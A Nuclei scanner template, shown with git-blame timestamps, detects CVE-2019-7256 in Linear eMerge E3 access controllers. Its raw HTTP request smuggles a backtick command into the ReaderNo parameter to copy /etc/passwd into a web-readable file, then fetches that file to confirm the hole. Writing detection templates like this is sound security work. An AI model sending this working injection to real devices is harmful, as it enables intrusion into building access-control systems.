nuclei-templates/cves/2019/CVE-2019-7256.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-7256
2020-09-06 11:55:23 +00:00
info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
2021-03-30 06:27:35 +00:00
description: Linear eMerge E3-Series devices allow Command Injections.
2021-03-10 14:15:41 +00:00
reference: https://www.exploit-db.com/exploits/47619
tags: cve,cve2019,emerge,rce
2020-09-06 11:55:23 +00:00
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
requests:
- raw: # Default Port
2020-09-06 12:06:45 +00:00
- |
2020-09-06 11:55:23 +00:00
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
2020-09-06 12:06:45 +00:00
- |
2020-09-06 11:55:23 +00:00
GET /nuclei.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
2020-09-06 20:52:50 +00:00
matchers-condition: and
2020-09-06 11:55:23 +00:00
matchers:
- type: status
status:
- 200
2020-09-18 14:58:38 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"